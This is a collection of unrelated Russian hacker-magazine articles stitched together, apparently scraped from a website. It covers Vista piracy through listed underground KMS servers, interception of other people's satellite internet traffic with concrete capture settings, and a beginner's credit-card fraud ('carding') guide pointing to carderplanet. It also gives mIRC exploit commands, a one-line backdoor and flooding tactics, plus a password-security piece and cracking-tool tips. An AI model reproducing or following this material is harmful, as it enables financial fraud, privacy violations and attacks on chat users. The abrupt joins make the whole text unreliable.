Просмотреть количество оставшихся лицензий, а также узнать параметры сервера можно следующим образом:

$cscript \windows\system32\slmgr.vbs -dli

Служба управления лицензиями активна

Текущее количество: 7

Порт: 1688

Опубликование DNS-записей: разрешено

Приоритет KMS: нормальный
Заключение

Помимо описанных выше, существует множество других способов активации, основанных на модификации исполняемых файлов или редактировании прошивки BIOS'а с целью включения в него валидного OEM-идентификатора, обнаружив который Виста вообще не требует никакой активации. Однако все эти способы ненадежны и небезопасны, а потому прибегать к ним можно, разве что желая поэкспериментировать. Никаких других оснований у нас нет. Какой смысл отказываться от MAK/KMS-активации, особенно в нашей стране, где достать корпоративную редакцию Висты ничуть не сложнее, чем версию для розничной продажи?
Активные хакерские KMS-серверы

Ниже приводятся адреса некоторых подпольных KMS-серверов, пригодных для активации корпоративных версий Висты, приобретенных в соседнем киоске в полном соответствии с действующим законодательством.

Номера портов периодически меняются, поэтому, прежде чем активироваться, следует посетить главную страницу и ознакомиться с оперативной ситуацией. В частности, для захода на сервер kms.vbs.net.cn:7249 необходимо оттяпать номер порта (7249) и субдомен (kms), набрав в адресной строке браузера «vbs.net.cn», и там среди китайских иероглифов отыскать необходимую информацию.

kms.vbs.net.cn:7249

pkms.xicp.cn

210.51.189.66:1025

210.51.189.66:1888

121.46.195.58:1688
Активация висты с помощью MAK-ключа

Существует два способа MAK-активации: самостоятельная и опосредованная. Самостоятельная MAK-активация выполняется пользователем и требует прямого соединения с интернетом. Опосредованная MAK-активация позволяет выполнять централизованный запрос активации для нескольких компьютеров с помощью одного подключения к серверам компании Microsoft. Однако в настоящее время она все еще находится в стадии разработки, проходящей под кодовым названием VAMT (что расшифровывается как Volume Activation Management Tool — «средство управления многопользовательской активацией»), поэтому ниже будет рассмотрена только самостоятельная активация.

Проще всего активировать компьютер через графический интерфейс. Для этого необходимо:

   1. установить нужный носитель с корпоративной лицензией (во время установки ключ продукта не требуется);
   2. войдя в систему с правами администратора, открыть «Пуск -> Панель Управления -> Компьютер -> Свойства»;
   3. в разделе «Активация» нажать кнопку «Изменить ключ продукта»;
   4. подтвердив запрос на изменение (кнопка «Продолжить»), ввести MAK-ключ.

В следующий запланированный интервал времени компьютер попытается выполнить активацию через интернет, сообщая об успешности (или не успешности) операции.

Поклонники командной строки могут активировать Висту через скрипт slmgr.vbs, передав ему ключ ‘-ipk’ вместе с MAK-ключом:

$cscript \windows\system32\slmgr.vbs -ipk <MAK-ключ >
WWW

    * «Microsoft Windows Vista — варез, а не активация!» - ссылки на корпоративную редакцию Висты, образы активированных KMS-серверов, пошаговые руководства по активации (на русском языке): http://forum.ru-board.com/topic.cgi?forum=35&topic=33690#1.
    * «Windows Genuine Advantage» - обзорная статья на Wikipedia, посвященная WGA (на английском языке): http://en.wikipedia.org/wiki/Windows_Genuine_Advantage.
    * «Пошаговое руководство к службе Windows Vista Volume Activation 2.0» - официальный документ от Microsoft по системе активации (на русском языке): http://www.microsoft.com/rus/technet/windowsvista/plan/volact1.mspx.
    * «The Windows Genuine Advantage (WGA) and Office Genuine Advantage (OGA) FAQ» - официальный FAQ по WGA и OGA от Microsoft (на английском языке): http://www.microsoft.com/genuine/downloads/FAQ.aspx?displaylang=en.
    * «SLA 2.0 Supported BIOSes for Instant Windows Vista OEM Activation» - статья, рассказывающая об OEM-активации Висты, осуществляемой путем редактирования прошивки BIOS (на английском языке): http://www.mydigitallife.info/2007/02/21/sla-20-supported-bioses-for-instant-windows-vista-oem-activation/.
    * LogMeIn Hamachi - популярная программа для безопасного обмена файлами через VPN, используемая многими хакерами для распространения Висты: www.hamachi.cc.



Спутниковый грабинг: файлы с неба!

Ну ладно, хватит теории, перейдем к практике.

Что вам надо:

    * Тарелка (желательно не железная за 20$, а что-нибудь посерьезней, например акриловая ~100$, особенно если вы планируете днем и ночью сидеть и грабить, грабить - в любую погоду - и т.п.), на пути сигнала не должно быть крупных объектов (домов, телевышек и подобного), а лучше чистое небо, иначе будут помехи.
    * Ротер - вещь не обязательная, но весьма полезная, т.к. тарелку можно будет удаленно вращать, и, тем самым, охватывать больше спутников, искать тот самый, который вам нужен (так же с ним будет проще поймать хороший уровень сигнала).
    * DVB карта - сгодится почти любая, но, как показывает опыт, меньше всего проблем с настройкой (в том числе в Линуксе) и наименьшее количество разрывов связи даёт SkyStar 2.
    * Куча проводов.
    * Альпинист-любитель чтобы повесить тарелку.

На один компьютер можно поставить две, три, сколько угодно DVB карт, но тогда стоит иметь несколько винтов и процессор пошустрее.

Итак, как всё это работает.

Почему можно получать чужой трафик, когда эта халява закончится и что будет, если начнешь грабить. По порядку:

   1. Это возможно потому, что спутник не может пучком передавать информацию именно в ту тарелку, которая её запросила (тарелка не может запрашивать - это образ) - он только может передавать её кучей, на всю поверхность, для всех. И только частный компьютер (или ресивер) её сортирует и пытается найти ту информацию, которая принадлежит ему, анализируя заголовки. Когда ищешь что-то приходится просматривать и чужое: а вдруг ваши деньги в чужом кармане - всяко бывает ;))
   2. Итак, понятно почему мы получаем информацию, но отчего её не шифруют, ведь достаточно передавать не зашифрованные заголовки пакетов чтобы компьютер понял для него это или нет? Ответ прост - это дорого и неудобно. Зачем шифровать если никого это не волнует, к тому же скорость обработки информации уменьшится (т.к. придется тратить время на шифровку), оборудование нужно будет мощнее, да и каждому клиенту ключ давать. Короче провайдеры на это забили. Их можно понять.
   3. Когда закончится. Тогда, когда найдут способ быстро и эффективно шифровать данные, а люди думающие не захотят расшифровывать ключи или адсл резко удешевится, ну вы поняли к чему я веду: на наше поколение хватить, да и внучкам достанется.
   4. Что за это будет. Хммм... сложно сказать, прецедентов не было, а все оттого, что, во-первых, вы все время получаете чужую информацию и в этом виноват провайдер; во-вторых, не возможно отследить получили вы чужую информацию или нет, ведь тарелка работает только на прием и данные никакие передавать не может.

Предположим, что вы купили и установили все необходимое, что делать теперь? Рассмотрим пример на самой популярной сегодня ОСи Windows (для Линукс все так же, только программы и драйвера другой компиляции, все они легко доступны, а алгоритм действия тот же). С DVB картой проблем быть не должно, но желательно драйвер устанавливать не с заводского СД, а поискать последнюю версию (Для SkyStar 2 существуют модификации, специально заточенные под грабинг. У Линуксоидов выбора нет, на сегодня существует только один драйвер под Линукс, и он не официальный, зато без глюков. Естественно, грабинг под Линукс - это больше геморроя, но ошибок по приему будет значительно меньше, т.к. программа сможет взять под контроль максимум ресурсов, овчинка выделки стоит только если у вас возникли проблемы с Виндоус грабингом, а со SkyStar 2 это бывает очень редко.) Далее вам будет нужна программа для грабинга (ну если вы не планируете её писать с нуля). Таких программ на сегодня великое множество, но я советую SkyNet:

   1. Она бесплатная (хотя они все такие ;)).
   2. Её исходный код полностью открыт и готов к модификациям.
   3. Её удобно использовать, т.к. в ней предусмотрены фильтры и возможность подключить в ручную отлов файлов с особым расширением.
   4. Её поддерживают огромное количество людей, будет с кем посоветоваться.

Теперь вам нужно узнать характеристики транспондера, а также PIDы доступа к Интернет трафику. Все не так сложно как звучит. Характеристики транспондера можно узнать на сайте провайдера, предоставляющего услуги Интернета, там же можно узнать как минимум 1 PID. Но PIDы проще искать через специальную утилиту для программы ProgDVB "Pidscanner" - она свободно распространяется и найти её не сложно, кстати, SKYNET иногда тоже идет как plugin к этой популярной программе, но я советую использовать раздельную версию, оттого что плагином она уже давно не поддерживается.

Приведу пример настройки для HeliousNet провайдера (он предлагает интернет только крупным и малым компаниям, оттого трафик у него интересней - на халяву всякое качают) на спутнике Express AM 22 - так как он доступен большему числу Дорогих Россиян, ведь он охватывает территорию почти до Уральских гор.

tuner=11124000,V,7593000,A
pids=700,710,4177,4162,4161,4160

Настройка программы и её фильтров. Перед тем как программа начнет работать, необходимо будет найти файл StreamReader.dll для SkyStar 2- это не сложно, достаточно воспользоваться любым поисковиком. После того как вы его скачаете, скопируйте его в каталог к SkyNet, не важно является она плагином или программой, без него работать не будет - в этой библиотеке описаны API функции DVB карты, естественно от модели к модели они различны. Далее есть смысл заглянуть в файл skynet.ini, там нам надо будут интересны три строчки:

name_format=*/E/_25.01.06/p/s_m_R(c_p).E - что какая буква означает расписано подробно в комментариях к этому файлу - вкратце эта строка означает, что корректно перехваченные файлы будут сохраняться в директории ok/расширение файла/дата/пид/имя файла в виде источника получения, счетчика, мак адреса карты получателя и т.п. Не удивляйтесь что имя файла так изменено. Дело в том, что невозможно узнать изначальное имя, ведь предполагается, что запрос был сделан через браузер, и он знает, что именно будет получать. По этой причине, увы, перехваченные html файлы будут без графики - она будет перехвачена отдельным файлом, уже не взаимосвязанным с html.

Оставшиеся две:

tuner=
pids=

пример как их заполнять дан выше.

Теперь рассмотрим правила перехвата файлов. Они описаны в файле regex.txt - данный файл можно обновлять динамически, во время работы программы; чтобы она его вновь считала достаточно нажать Ctrl+R (это касается и файла rules.txt). В нем подряд расположены строчки описывающие группы расширений перехватываемых файлов, в таком виде:

80C000 b ^\x00\x00\x01\xB3 mpg;VIDEO;ALL
008000 b ^PK zip;ARCHIVE;ALL

Первое слово - цвет отображаемой линии - не важно, что будет написано, это для интерфейса программы, затем, через пробел, пишется бинарный файл или текстовый( b или t), опять, через пробел, после символа "^" пишется содержимое первых n байтов файла (n задается в файле skynet.ini) в двух вариантов либо в шестнадцатеричном, тогда указывается \x число, либо в текстовом, тогда просто символы. Через пробел, пишем в начале расширение файла, затем, через ";", группы к которым он относится (о них ниже), в конце строки ничего ставить не нужно. Для одного расширения можно указывать несколько строчек, все корректно считаются и обработаются. Группы описывать не надо, создаются автоматически после первого упоминания.

Теперь о фильтрах. Они описаны в файле rules.txt. Если два фильтра противоречат друг другу, то будет принят во внимание только первый. Корректно работает система восприятия фильтров как множеств (то есть можно написать: "принимать все от такого то мак адреса", а далее: "не принимать изображение от него же", это не противоречащие фильтры, программа просто станет принимать всё кроме изображений с выбранного мак адреса).

Как формировать:

s 1.2.3.4 +[100k-] -IMAGE[0-40k]
m a0940128b8 +IMAGE[1K-1G]

Есть два варианта первого символа

   1. m - означающий, что далее речь идет о мак адресе принимающей DVB карты.
   2. s - что дальше будет IP адрес ресурса откуда скачивается файл.

Затем через пробел указываем адрес, в том или ином виде, затем строку такого типа:

первый символ: "+" / "-" - означает принимать или нет;
затем слово - наименование группы, если пропустить то все;
квадратные скобочки, внутри которых можно указать необходимый размер:
если интересуют все файлы, то не писать квадратные скобки;
если от какого то размера и выше то пишем [100k-] все слитно, черточка в конце обязательна;
если любой, но не больше, то [-1G], опять же черточка нужна;
если в определенных рамках, то [100k-1G].

Заключение

Этого должно быть достаточно чтобы начать изучать грабинг - естественно только для благих целей: чтобы продумать, каким образом улучшить шифрования и понять, что читать почту через спутник не стоит, ведь её прочтут ещё несколько сотен тысяч людей.

P.S. Советы по уменьшению обрывов (discontinuity)

   1. Дефрагментируйте винчестер.
   2. Смените приоритет для DVB карточки.
   3. Отключите все посторонние программы и устройства, освободите все прерывания.
   4. Переустановите ОС.
   5. Повторите пункт 2-3.
   6. Если не помогло, то поставьте Линукс.
   7. Перекомпилируйте ядро, чтобы выделить максимум ресурсов для DVB карты.
   8. Уберите все лишние приложения, в том числе графический интерфейс.
   9. Если не помогло, то скорректируйте положение тарелки, либо/и смените её, уровень сигнала желателен 80%, можно 60% (но тогда забудьте об архивах и программах - слишком вероятно, что прокрадется ошибка).
  10. Сдайте свою DVB карту - она неисправна, после всего выше перечисленного разрывов быть не должно совсем.

Моя конфигурация компьютера и OS (ноль разрывов всегда):

Sempron 2500+ (64 bit);
512 Ram;
ATA 100 винт;
SkyStar 2;
Windows XP (32bit);

Остальное не важно. На моем компьютере во время грабинга (без разрывов) можно смотреть фильм, находиться в Интернете, играть по АДСЛ - проблем не возникало.
Спутниковое ТВ, халявное ТВ, взлом спутников, спутник, граббинг, Спутниковое телевидение



Кардинг для новичков
Начнём с анонимности, которая была бы по душе как билингу, так и нам .

Берём небезизвестную софтину SocksCap32
(это программа для запуска различного софта под соксом), скармливаем ей соксик, потом запускаем через неё
броузер, а cамому броузеру скармливаем простую неанонимную прокси нужного нам шатата - чтоб если билинг
и имеет фичу проверки ip с сопоставлением региона, то он бы был счастлив безмерно.
Проверяться можно простым путём, на www.all-nettools.com/pr.htm - там мы глянем анонимны мы или нет. Там кстати есть и ещё много полезных тулзов. Если кому-то сомнительно, что билинг различает анонимные прокси то это можно легко проверить.
Берём анонимную проксю и пишем в броузере ya.ru - так вот он большинство анонимных проксей не пускает, видно
не настолько они анонимные как бы хотелось. Также заголовки смотрят, системный язык и это всё также подменяется разным софтом. Насчёт каким? Так его массы; наконец, можно прочесть или спросить на carderplanet.

Итак картон ты купил на планете, или сам нарыл, или кто-то дал ... в общем, ты готов к работе, как вдруг твой боевой дух и клич заднего места быстренько тебя расслабляет )))) - а что делать то собственно?
(это я не у вас спрашиваю ...). А делать то вот что - то же, что и всегда - искать, бороться, найти и закардить.

А что искать-то? А искать мы будем тех, кто платит - а кто платит мы проверим методом тыка...или узнав на carderplanet. Мы же не будем переходить на название и конкретику - это было бы некрасиво. Каждый пусть ищет и найдёт/сопрёт/купит/поменяет своё место сам. Скорее всего это уже не будет казино, а будет, к примеру,
тотализатор (надеюсь, не надо объяснять что это такое). Искать сие сокровище желательно на поисковиках неизвестных где-нить глубоко и далеко, так как все самые громкие конторы платят только поначалу а потом наша братия быстро заставляет их задуматься о своём доходе. Если кто то считает, что тут не о кардинге, то зря, так как кардинг вбирает в себя множество других "наук". Как быть если злостный биллинг всё равно не хочет принимать карты? Не надо торопиться,
бежать и орать продовцу, что он их сам сгенерил или просто сочинил или что они чёрт знает откуда. Надо просто написать письмо конторе, что мол так и так, у меня такие то проблемы - что вы мне можете посоветовать, к каким банкам вы относитесь более доброжелательно. Как правило, тебе напишут несколько имён банков, карты
которых проходят лучше, чем другие.
Что делать с именами? Как узнать, тех ли банков у тебя карты? Всё гениальное просто - бежим на carderplanet и спрашиваем, есть ли у кого база банков по бинам (префиксам) - дело в том, что
первые 6 цифр на карте несут информацию, какому банку принадлежит карта. Думаю дальше всё понятно(если непонятно
то из тебя будет "кардер что надо" и ты заработаешь миллион быстрее остальных..). И так если реги опять не проходят, а пальцы не потеют ... поздравляю ты наверно гей так как юзаешь рексону .

Итак, предположим, что ты нашёл/спёр/купил/поменял конторку, которая платит, ты зарегался и выиграл. Уже кричишь "ура", как тут тебя опять раслабляет всё тот же боевой клич всё из того же места . Так вот - зелёные бумашки с изображением моей бабушки обычно выплачивают либо на PayPal, либо высылают по ACH, либо остальное как нас не интересует как правило ... а как обналичить, как получить, и чтоб всё анонимно - это тебе прямиком к нам на
carderplanet - там ты найдёшь себе всё, что нужно и нужных людей.



Уязвимости IRC каналов
I. DOS Device
bug

Нужно сказать, что появление на свет concon'a не слабо ударило
по забугорной части IRC (по нам не сильно, т.к. в то время новые баги доходили
до нас "с некоторым" опозданием). Одна лишь команда "/ctcp #lamez sound concon"
уносила всех пользователей win9x с канала #lamez. В Win98SE и ME проблема была
решена, но, как оказалось, не до конца. Программеры из MS избавили нас от синего
экрана, но запретили создавать файлы с названиями совпадающими с именами
устройств в DOS (prn, lpt, con, aux). Так вот, многие (почти все) разработчики
программного обеспечения не предусматривают эту особенность в своих тварениях,
точнее думают, что на их продуктах она никак не может сказатся. Автор мирка
(Khaled Mardam-Bey) не исключение. Любое обращение к файлу с
названиемрасширением AUX (на все остальные mIRC не реагирует), приводит:
1)
в 9xMe к поеданию всех системных ресурсов мирком. Причём, если всётаки удаётся
убить процесс, в дальнейшей работе Windows'a наблюдается большое кол-во глюков
(значки меняеются, появляются чёрные полоски и тд). В общем, советую сразу жать
reboot.
2) XP2k не дают сожрать все ресурсы, но сам клиент неминуемо
виснет.
Уязвимые
команды:
/load
/loadbuf
/write
/play
/writeini
/remini
/splay
Уязвимые
функции:
$read()
$readn()
$readini()
$crc()
$file()
$ini()
$lines()
$mklogfn()
$sfile()
$shortfn()
Прошу
прощения, если какие-то упустил.
Ну а теперь поговорим о том, как можно
поюзать баг удалённо (cразу оговорюсь, что "голый мирк" никак не отреагирует на
ctcp-запрос "sound aux"). Большинство разработчиков более ли менее
функциональных mIRC-скриптов, пытаются поставить свои обработчики на ВСЕ
события, которые вообще могут произойти (даже отлавливают raw и error). Я
абсолютно ничего не имею против, но как раз это их и подводит. Вот пример
обработки sound-реквеста одним популярным немецким скриптом (важные строчки
комментирую):

ctcp *:*:*:{
if (($os < 100) && ((*con?con* iswm
$2-) || (*nul?nul* iswm $2-))) {
;## Проверка на concon и nulnul
echo
$evcol(ctcp) -ati2 $cl(kick) $gtd(Warning) $sd($mnick($chan)) attempted to play
$2 $+ , process halted
halt
}
if (($1 == sound) || ($1 == mp3))

&& ($exists($+($wavedir,$2))) { splay $2 }
;## Если запрашивается
звук и требуемый файл существует в $wavdir, запускаем его.
}
;## NoName
Script v.3.5 :: www.nnscript.de
Функция $exists() ошибочно считает, что файл
aux существует и возвращает $true (этот баг уже был описан нашей командой), что
нам как раз нужно. Команды:
/ctcp sound aux.wav
/ctcp mp3
aux.wav
отправят любого пользователя данного клиента в кому. Подобная
проблема присутствует в каждом втором мирк-скрипте.

II. "Autoping"
bug

Почти все новые скрипты имеют функцию "Remote lag check".
Работает она очень просто. Вы говорите одно из ключевых слов (обычно ping,
!ping, .ping, ping me и т.п.), удалённый клиент пингует вас и посылает вам
noticeprivmsg с вашим же ответом. Вот пример из Boss Script
2002:
#autopinger on
on 1:text:*ping*:#:/ctcp $nick ping
on
1:ctcpreply:ping*:{
set %pt 0
%pt = $ctime - $2
notice $nick Your Ping
Reply from. $server .is : .( $+ %pt $+ ). Second(s)
%ver
halt
}
#autopinger end
Посмотрите, мы одним словом заставляем
скрипт послать ctcp запрос, а потом notice. И самое интересное, что обычно
(читай всегда) никаких ограничений на кол-во лаг-чеков не ставят. Это открывает
перед нами возможность зафлудить счастливого обладателя уязвимого скрипта просто
послав ему кучу мессаг, содержащих слово "ping". Но и тут не без подводных
камней. По идее, нам помимо мессаджа с ключевым словом, придётся посылать ответ
на "ctcp ping", то есть мы сами рескуем быть зафлужеными. Поэтому советую
"работать" с кем-нибудь на пару.
Точное количество мессаг для зафлуживания
назвать не могу, т.к. это зависит от IRC-сервера, а точнее от его флуд-лимитов.
Лично на моём IRCplus'e при дефолтовой конфигурации понадобилось ~11
мессаг.

III. backdoor

Да, да, далее пойдёт речь не о баге,
а о бэкдоре, который получил ооочень широкое распространение в первую очередь
из-за своего маленького размера. Он занимает не 10kb, не 1kb, не 500b. Он
занимает 1 (!!!) строчку размером 14 байт:
ctcp *:*:?:$1-
И вот эта вот
строчечка даёт полный контроль над компьютером, при условии хорошего знания
скриптинга конечно. Как же она работает? Гениально просто - при получении
клиентом ctcp-реквеста, всё его содержимое отправляется mirc-интерпритатору. А
если говорить по русски:
/ctcp
У nick'a на
машине выполнится command.
Существует несколько модификаций бэкдора. Так что,
помимо прямой отправки комманд, стоит попробывать:
/ctcp cmd

/ctcp script
Иных не встречал, но это
не значит, что их нет.

IV. command execution

Баг
встречается в скриптах, которые каким-то боком обрабатывают посланные удалённым
пользователем данные. Наболее распространённые уязвимые функции: guestbook и
pager. Я, пожалуй, разберу случай посложнее.
Всем известен самый
распространённый и мною уважаемый русский мирк-скрипт
href="http://www.neora.ru/">NeoRa TrioN. Но не все знают, что несколько
месяцев назад в нём была найдена подобная проблема (подробно на ней
останавливаться не буду, кому интересно лезте
href="http://dhgroup.org/bugs/index.shtml">сюда). Скрипт сохранял все топики
и quit-сообщения в отдельный файл. И делал это весьма каряво. При попытке
сохранить данные вида:
[some_text] } [cmd]
[some_text] | [cmd]
На
удалённой машине выполнялась "cmd".
Что касается гостевых книг, пэйджеров и
всех остальных примочек, эксплойтирование такое же.

V. aux bug
#2

Очень интересная уязвимость, о которой, кстати, мало кто знает.
Разберём скрипт Polaris IRC. В него встроен свой собственный скриптовый логгер
(видать дефолтового mirc'овскоого создателям было мало..). Он записывает все
приваты и dcc-чаты в отдельный файл. А проблема в том, что название файла
генерится по правилу: $nick $+ .log. Так вот, если у нас будет ник aux, то мирк
не сможет создать такой файл и заменит его на au_.log.
Сама уязвимость
кроется в функции View log. При попытке скриптом показать лог чата с юзером AUX,
он будет пытатся открыть файл aux.log, а не au_.log, и повиснет.
Подобные
уязвимости встречаются также в гостевых книгах и пэйджерах, когда файлу с
сообщениями юзера присваивается его ник.
Обобщая тему этой уязвимости, нужно
сказать, что она встречается во всех скриптах, где удалённый юзер как-то может
влиять на название иили расширение какого-либо файла.

VI. Low flood
protection

На данный момент защита от флуда присутствует даже в самых
отстойных и глючных скриптах. Вот наиболее распространённая схема её
работы:
после N1 ctcp-запросов за N2 сек. юзер кидается в игнор на N3
сек.
Так вот, иногда встречаются кадры, которые кидают юзеров в игнор по
маске nick!*@*. То есть, чтобы обойти защиту от флуда, нам нужно всего лишь
регулярно (после каждых 3-5 запросов) менять ник. Flood Clon'ов с такой
примочкой я ещё не видел, а самому писать в лом. Если у тебя руки на месте,
можешь попробывать.

Чтож, пожалуй это все уязвимости, которые я встречал
в mIRC-скриптах..
PS. вот клиенты, в которых 100%-нтно присутствуют
какие-либо из описанных выше уязвимостей (метка "#" означает, что скрипт имеет
широкое распространение):
Neo-Ra Trion v.10 #
MurderScript 2001
Polaris
IRC v2.04 #
eXtreme #
WarSatan
Hкеvксly$ўrоюt 2002 script #
Boss
script v.2002
SiN4pSi77 ScRipT 6.2
[LLMirc PRoі] v.3.5a #
Stalker
Script 8.0 Final
7th Sphere 3.0 #
NiTrO ScRiPt V2 2002 (Beta)
#
gAnGstERs FlooDinG ScripT
NoName Script v.3.* #
coolpakiz Script
v1.0
IRCopen backdoor scan v1.27x
Xspy Game v.2.0.beta by Bl00r
Hackz
script

Скачать их можно с сайта http://www.xcalibre.com/



Самые популярные пароли
пользователей, выбирающих легко угадываемые пароли. Некоторые берут слова прямо из словаря Webster, другие применяют клички животных, а еще больше тех, у кого паролем служит имя тайного поклонника. Особо осмотрительные добавляют к концу выбранного подобным образом слова один-два лишних знака. Но это тщетная предосторожность, учитывая, что современные компьютеры способны перебирать миллионы измененных слов в секунду и часто меньше чем за минуту отгадывают значительную долю паролей

КЛАДЕЗЬ МАГИЧЕСКИХ СЛОВ
Для злоумышленников это золотое дно. Слабые пароли не обязательно облегчают вход в корпоративную сеть, но если хакер уж получил к ней доступ какими-то другими средствами, то для него это просто клад. Пароли, вскрытые на одном сервере, часто открывают путь к другим, а имея цифровые ключи к большой части учетных записей, злоумышленник может безнаказанно орудовать в сети под личиной легитимного пользователя.

Вот почему злоумышленники стараются в первую очередь завладеть паролями. Некоторые вирусы и черви посылают своему создателю файл паролей из зараженного компьютера. Самая строгая служба безопасности и цифровые крепости высоких технологий не много дадут, если генеральный директор защищает свои критически важные файлы паролем god123. Тем не менее, большинство компаний и организаций для аутентификации своих сотрудников все еще использует только пароли - и больше ничего.

Специалисты занимаются этой проблемой десятилетия. Еще в доинтернетовскую эпоху в далеком 1979 году, когда емкость внешней памяти измерялась в битах на фут магнитной ленты, появился документ, кричащий о том, что треть пользовательских паролей можно подобрать за пять минут. А ведь у тяжелой цифровой артиллерии тех дней, компьютера PDP-11/70, поиск случайной комбинации из восьми букв и цифр методом простого перебора со скоростью 50 тыс. комбинаций в минуту занял бы в среднем 66 лет.

То же исследование обнаружило, что пользователи почти неизменно выбирают ненадежные пароли, упрощая жизнь злоумышленникам. Авторы Кен Томпсон и Роберт Моррис-старший среди почти 3300 проверенных паролей обнаружили около 17% таких, которые состоят из трех и менее знаков, почти 15% - из четырех знаков и еще 15% были взяты из общедоступных словарей. В результате почти половину паролей можно было подобрать менее чем за шесть часов.

Не сомневайтесь, восьмизначный пароль может быть очень надежным, даже если для взлома применяются современные быстродействующие компьютеры. Из 95 печатных символов можно составить 6,6 квадриллионов разных 8-значных комбинаций. Учитывая, что некоторые программы подбора паролей на системе с последней моделью процессора Pentium 4 могут проверять почти 8 млн комбинаций в секунду, на взлом 8-значного пароля в среднем уйдет более 13 лет.

За два последних десятилетия операционные системы усилили средства защиты вокруг паролей. Когда-то файл паролей - набор зашифрованных ключей к программным замкам системы - мог прочесть каждый, так что хакеру было легко скопировать этот файл и затем расшифровать его на своем компьютере. Теперь операционные системы обычно позволяют читать зашифрованные пароли только системным администраторам, так что хакер, чтобы заполучить этот файл, должен иметь права администратора. Кроме того, общепринятыми стали правила входа в систему за три попытки: если пользователь не указал правильный пароль с нескольких раз, доступ для него блокируется.
ЦИФРОВОЙ ЭФФЕКТ ДОМИНО
Все эти уровни обороны затруднили происки хакеров, основанные на угадывании пароля при помощи списка общеупотребительных слов, - так называемые атаки по словарю, однако этот метод все же оказывает им неоценимую услугу как средство расширения уже имеющегося доступа к сети. Пробравшись тем или иным способом в один сервер или ПК, злоумышленник может в обход всех систем защиты заполучить пароли, открывающие другие сетевые замки, - эдакий цифровой эффект домино.

Единственный способ борьбы с этим злом - сделать пароли почти неугадываемыми, но тогда их нужно выбирать абсолютно случайным образом. Человеку сделать это довольно трудно. «Придумывая пароль, человек очень плохо имитирует случайный выбор», - констатирует доцент кафедры вычислительной техники Университета штата Вирджиния Дэвид Эванс. Более того, так как обычно приходится помнить сразу несколько паролей, попытки запирать свои учетные записи случайными, но трудно удерживаемыми в памяти ключами, такими как »X%95qd! - самый надежный способ заполучить мигрень. «Нужно придумать что-то легко запоминающееся, что служило бы хорошим паролем», - говорит Эванс.

Многие администраторы стараются научить пользователей различным мнемоническим приемам получения надежных и в то же время запоминающихся паролей. Широко распространен метод первых или последних букв каждого слова известного пользователю высказывания. Например, из фразы Friends don`t let friends give tech advice, произвольно сделав некоторые буквы прописными и заменив часть из них знаками препинания и цифрами, можно составить пароль fD!Fg7a. Однако вся эта наука, похоже, не идет впрок, и по мере роста процента пользователей компьютеров с низким уровнем технической подготовки проблема паролей становится все острее.

КЛЮЧ ЗА РУЧКУ
В ходе недавнего исследования фирма PentaSafe Security Technologies обнаружила, что четверо из пяти работников готовы сообщить свои пароли кому-то из сослуживцев, если те об этом попросят. Но это бы еще ничего. В ходе другого исследования той же компании почти две трети служащих, опрошенных на вокзале Виктория в Лондоне, выложили свой пароль за дешевую авторучку.

Неудивительно, что компании все больше беспокоит такое наплевательское отношение к ключам от их информационного королевства. Для потенциальных злоумышленников каждый пароль значит гораздо больше, чем доступ к защищаемому им компьютеру. Хакер, получивший список паролей с сервера или ПК, может использовать их для получения доступа к другим компьютерам сети в обход всей, возведенный для защиты от него крепости системы безопасности. Более того, если злоумышленник подобрал цифровые ключи к сети, администратору бывает очень трудно избавиться от него. До тех пор, пока не приживутся более надежные способы защиты, самым уязвимым местом останутся пользователи и пароли, которые они выбирают.






Небольшая инфа для новичков!
Во-первых, любому хакеру или тому, кто хочет им стать, надобно знать ассемблер. Со знанием одного бейсика-васика и второго трубопоскакаля далеко не уедешь, ведь рассматривать содержимое программ, исследовать их приходится преимущественно в совершенно `сыром` виде - машинных кодах и ассемблере. Есть у меня один знакомый, так тот вообще может декодировать команды из набора байтов в файле прямо в уме. Тут главное - немного терпения. Опыт придет со временем, и все будет на все сто. А то и на двести.

Вспомогательные утилиты

Итак, инструменты. Конечно, в первую очередь это программы, позволяющие определить, что именно перед тобой - картинка с длинными ногами и большими сиськами или запакованный ехе-файл. Некоторые детекторы позволяют определить тип файла, если он был запакован (отдельную статью о паковке exe-файлов смотри в следующих номерах журнала). И даже - попытаться снять защиту. Рекомендую ExeInfo by Adam Lojewski - весьма полезная вещь для анализа исполняемых файлов. Для удобства ее интерфейс пропатчили (спасибо STI) на предмет русских названий меню и надписей - от этого она только увеличила свою привлекательность для новичков и тех, кто ею пользовался до этого. Отвлекусь на пару слов, отхлебну пивка и скажу про Compare2Unlimited by Professor Nimnull. После того как дело сделано и в программу внесены изменения, неплохо бывает получить список измененных байтов. Выписывать вручную - слишком утомительно, и наверное, поэтому существует большое количество программ для автоматизации этой процедуры. Но C2U - одна из лучших. А для создания *.xck файлов хочется отметить XCKMaker 2.0 by Spider.

Hex-редакторы

Одним из основных инструментов кул хацкера (сразу после пива) является hex-редактор. Обычно, такая прога совмещает в себе возможности просмотра-редактирования файлов в шестнадцатиричном/текстовом (ASCII) формате и некоторые дополнительные фичи. Некоторые особо навороченные позволяют декодировать байты файла в инструкции ассемблера и даже писать на ассемблере и менять инструкции, что называется, не отходя от кассы. Здесь можно отметить, пожалуй, только две программы, сохраняющие популярность в течение уже ооочень большого периода времени. Программы хорошие и, что немаловажно в совдепии, бесплатные. Хотя, как говорится, для хакера из Багдада нет преграды... Но что-то же должно быть бесплатным! `Не все нужно ломать, надо же на чем-то и сидеть`, - как сказал один мой знакомый. Одна из программ называется Hacker`s View (HIEW) by SEИ.
Несмотря на кажущуюся простоту HIEW, я уже не мыслю работы на своём замечательном пивзаводе без неё. Кроме того что она сама управляет пивоваренными котлами и подвальными холодильниками, она имеет полнофункциональную поддержку pe/ne и кучи других форматов файлов и такие очень удобные фичи, как поиск инструкции по маске (например, хочу я найти присвоения регистру AX, тогда указываю: mov ax,? - и все - дело в шляпе. Будут найдены и mov ax,1, и mov ax,dx и т.д.). Все это позволяет мне сказать, что это лучший редактор. Как его (да и остальной софт, о котором я рассказываю) использовать, я буду говорить непосредственно перед тем, как буду этот софт юзать. Второй HEX-редактор - QView by ABC Product. Внешне - смотрится гораздо лучше, чем HIEW. Но вот с содержанием до HIEW ему далеко, хотя новые версии наверняка восполнят этот пробел. Хотя, вообще-то, редактор не обязательно должен быть красивым, как унитаз - скорее, простым, и практичным, как туалетная бумага.

Отладчики

